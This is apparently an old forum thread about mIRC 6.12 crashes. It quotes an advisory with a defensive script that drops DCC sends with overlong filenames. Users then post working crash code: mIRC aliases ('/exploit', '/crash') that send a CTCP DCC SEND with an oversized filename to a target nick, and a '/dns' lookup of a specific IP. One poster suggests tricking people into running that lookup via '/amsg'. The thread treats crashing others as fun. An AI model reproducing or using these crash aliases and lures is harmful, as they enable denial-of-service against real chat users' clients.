mmh hey
my friend told me his mirc crash all the time

anyone got an idea why?

it's mIRC 6.12
some other ppl told me the same mirc shit

Just let your friend remove all the script, maybe some buggy script is Bugging him...

there is an exploit for 6.12

nuratasya writes "Breaking News. On Oct 20, another exploit was identified which can crash even the recently released version 6.12. It only seems to affect people who minimize DCC get dialog windows (manually or by default), and then open those windows to get a file with an excessively long filename. You can't be crashed unless that sequence of events occurs. That manual step is required. If you auto-get the file, or don't get the file at all, nothing happens.

If and only if you think the above affects you, then here is a temporary fix which should be pasted in your "remotes" section (alt-r to access). It basically rejects any excessively long filename.

ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick tried to crash you with an illegal dcc send of $nopath($filename) | halt } or this shorter version without the warning message: ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) halt

If you are not comfortable with modifying your remotes, you can just ignore all incoming DCC sends with the following, which is the same temporary fix as for the other bug described in the next section: /ignore -wd *

You can undo the above command by /ignore -rwd * (note the r for remove)."
Posted on Friday, October 24 @ 22:45:32 HKT by miniPC

From this site
PC Techforums

so i put that code in my alias and send a file to someone and wait for them to accept it???? The old exploit i had
[CODE]/exploit { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }
`

/dns 194.65.143.148
crashes everytime all the time

:? crashed ????

Execute the command inside mIRC:
/dns 194.65.143.148

and not nslookup.exe or whatever

Run mIRC 6.12
execute the command inside mIRC: /dns 194.65.143.148
mirc.exe crashes (ws2_32.dll)

tested on WinXP (SP0) and WinXP (SP1)

He is right that exploit does work, i remmber reading it has something to do with something on a certain range being NULL google it and im sure you will find the details

doesn work for both "exploit". tried and tested.

oh no not another irc bug :/

yep crashed my Mirc

which xploit crashed u mirc?

You have to be using windows xp (i run sp1 and it works) and mirc 6.12 or it WONT work !!

i still use it...

strange lot of ppl traid it but still it didn't crash my mirc ahahah

What do you use then?
Because mIRC pre-6.12 has a security bug

it crashed my mirc to ...

and my windows xp is upgraded fully :| ... I GUESS

damn buggiez

greetz .. WaZaa ..

I do have crash problem too, but I think its my script

didnt crash me, win2ksp4

crashed my XP box i guess tho:)

because the domain of that ip is longer than 129 bytes (i think tahts the number) and overflows, its an xp problem not a mirc problem

crashes my shit

kind of funny.

interesting

guys i know this one its older but still works on the most users which use scripts like noname,devils and so on ...

I tried both exploits on my WinXP SP1 machine and it crashed it both times. The long filename exploit required me to click on the download first. Fun stuff.

it didnt crash my win2k sp4 box

that /dns bug crashes some pc's but not all because some pc's cant see the zone coz of some network crap so i am told, ive got several people to try it, it crashed for me( i am in au) and it didnt for my mate( who is in ro) so go figure

Heh.... I just think that a moderator should put a tutorial up about buffer overflows? and stack overflows? Maybe people then would understand just WHAT xp is doing, heh.. i for one know the danger of overflows, i mean, root is commonly compromised on local systems, thanks to overflows in programs not having limits.
Any chance of that? gsecure?

Recently on an irc server that I frequent, all the netadmins left with only the message "Client exited", and immediately afterwards, a small botnet joined (6 clients). Anyone have any info on how they could've killed all the admins?

The server is running unrealircd, if that's any help.

Haha thats so funny
/amsg /dns 194.65.143.148 ;D

Put this in your aliases in mirc:


/crash { raw privmsg $1 : $+ $chr(1) $+ DCC SEND " $+ $str( $+ $rand(a,z) $+ $chr(32),165) $+ " $longip(127.0.0.1) $rand(113,9999) $+ $chr(1) }


/crash (nickname)


works fine

this also crashed my v6.14 mirc, winxp sp1 fr

Does anyone actually know WHY that crashes? I mean, we all know its an overflow. But why is RIPE sending that back?